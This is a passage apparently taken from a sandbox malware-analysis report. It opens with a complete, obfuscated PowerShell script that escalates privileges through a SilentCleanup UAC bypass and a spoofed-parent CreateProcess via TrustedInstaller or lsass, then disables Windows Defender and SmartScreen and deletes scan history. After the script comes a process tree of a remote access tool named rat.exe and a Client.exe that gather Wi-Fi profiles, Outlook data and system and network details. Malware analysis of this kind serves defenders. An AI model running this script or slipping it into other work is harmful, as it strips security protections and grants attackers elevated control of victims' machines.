        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @(echo off%)[1]
        sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
        if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}

        if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }

        start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1

        $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
        ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
        sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}

        $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
        $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition

        $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}

        $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
        $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
        $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script

        if ($u -eq 0) {
          start powershell -args $script -verb runas -win 1; break
        }
        if ($u -eq 1) {
          if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
          sp hkcu:\environment windir $('powershell '+$script+' #')
          $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
          if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
        }
        if ($u -eq 2) {
          $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
          1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
          $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
          $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
          1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
          nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
          $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
          'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
          $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
          $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
          $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
          $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
        }

        $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
        ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}

        sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
        sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
        sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
        sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
        sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
        sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
        sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
        net1 stop windefend
        sc.exe config windefend depend= RpcSs-TOGGLE
        kill -Name MpCmdRun -Force -ea 0
        start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
        del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
        del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
        '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
        #-_-#
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Suspicious use of AdjustPrivilegeToken

        PID 4392  C:\Windows\system32\sc.exe
          cmdline: "C:\Windows\system32\sc.exe" qc windefend
          - Launches sc.exe

        PID 3252  C:\Windows\system32\cmd.exe
          cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

        PID 3256  C:\Windows\system32\whoami.exe
          cmdline: "C:\Windows\system32\whoami.exe" /groups
          - Suspicious use of AdjustPrivilegeToken

        PID 1044  C:\Windows\system32\net1.exe
          cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller

        PID 3340  C:\Windows\system32\net1.exe
          cmdline: "C:\Windows\system32\net1.exe" start lsass

    PID 1636  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      - System Network Configuration Discovery: Wi-Fi Discovery

        PID 4688  C:\Windows\system32\chcp.com
          cmdline: chcp 65001

        PID 4200  C:\Windows\system32\netsh.exe
          cmdline: netsh wlan show profile
          - Event Triggered Execution: Netsh Helper DLL
          - System Network Configuration Discovery: Wi-Fi Discovery

        PID 1600  C:\Windows\system32\findstr.exe
          cmdline: findstr All

    PID 828  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

        PID 4184  C:\Windows\system32\chcp.com
          cmdline: chcp 65001

        PID 1960  C:\Windows\system32\netsh.exe
          cmdline: netsh wlan show networks mode=bssid
          - Event Triggered Execution: Netsh Helper DLL

    PID 1004  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd"

PID 1652  C:\Windows\system32\taskmgr.exe
  cmdline: "C:\Windows\system32\taskmgr.exe" /0

PID 2660  C:\Windows\System32\rundll32.exe
  cmdline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

PID 3920  C:\Windows\system32\OpenWith.exe
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

PID 1732  C:\Users\Admin\Downloads\rat.exe
  cmdline: "C:\Users\Admin\Downloads\rat.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

    PID 2624  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE4EC.tmp.bat""

        PID 1372  C:\Windows\system32\timeout.exe
          cmdline: timeout 3
          - Delays execution with timeout.exe

PID 2804  C:\Users\Admin\Downloads\Client.exe
  cmdline: "C:\Users\Admin\Downloads\Client.exe"
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - outlook_office_path
  - outlook_win_path

    PID 2840  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      - System Network Configuration Discovery: Wi-Fi Discovery

        PID 1540  C:\Windows\system32\chcp.com
          cmdline: chcp 65001

        PID 1400  C:\Windows\system32\netsh.exe
          cmdline: netsh wlan show profile
          - Event Triggered Execution: Netsh Helper DLL
          - System Network Configuration Discovery: Wi-Fi Discovery

        PID 2056  C:\Windows\system32\findstr.exe
          cmdline: findstr All

    PID 336  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

        PID 4532  C:\Windows\system32\chcp.com
          cmdline: chcp 65001

        PID 3064  C:\Windows\system32\netsh.exe
          cmdline: netsh wlan show networks mode=bssid
          - Event Triggered Execution: Netsh Helper DLL

    PID 5068  C:\Windows\SYSTEM32\cmd.exe
      cmdline: "cmd.exe"

        PID 3392  C:\Windows\system32\systeminfo.exe
          cmdline: systeminfo
          - Gathers system information

        PID 4972  C:\Windows\system32\HOSTNAME.EXE
          cmdline: hostname

        PID 4632  C:\Windows\System32\Wbem\WMIC.exe
          cmdline: wmic logicaldisk get caption,description,providername
          - Collects information from the system
          - Suspicious use of AdjustPrivilegeToken

        PID 4264  C:\Windows\system32\net.exe
          cmdline: net user

            PID 3136  C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 user

        PID 4208  C:\Windows\system32\query.exe
          cmdline: query user

            PID 1052  C:\Windows\system32\quser.exe
              cmdline: "C:\Windows\system32\quser.exe"

        PID 1040  C:\Windows\system32\net.exe
          cmdline: net localgroup

            PID 4804  C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 localgroup

        PID 1100  C:\Windows\system32\net.exe
          cmdline: net localgroup administrators

            PID 5056  C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 localgroup administrators

        PID 1492  C:\Windows\system32\net.exe
          cmdline: net user guest

            PID 3920  C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 user guest

        PID 1584  C:\Windows\system32\net.exe
          cmdline: net user administrator

            PID 5040  C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 user administrator

        PID 876  C:\Windows\System32\Wbem\WMIC.exe
          cmdline: wmic startup get caption,command

        PID 756  C:\Windows\system32\tasklist.exe
          cmdline: tasklist /svc
          - Enumerates processes with tasklist

        PID 3112  C:\Windows\system32\ipconfig.exe
          cmdline: ipconfig /all
          - Gathers network information

        PID 3208  C:\Windows\system32\ROUTE.EXE
          cmdline: route print

        PID 3224  C:\Windows\system32\ARP.EXE
          cmdline: arp -a
          - Network Service Discovery

        PID 2096  C:\Windows\system32\NETSTAT.EXE
          cmdline: netstat -ano
          - System Network Connections Discovery
          - Gathers network information

        PID 1632  C:\Windows\system32\sc.exe
          cmdline: sc query type= service state= all
          - Launches sc.exe
-
-
C:\Windows\system32\netsh.exenetsh firewall show state3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1628
-
-
C:\Windows\system32\netsh.exenetsh firewall show config3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:3588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:4844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:2040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:1376
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6160
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7088
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9736
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:6544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:7704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:8720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:9888
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:5184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11208
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:11256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"2⤵PID:10460
-
-
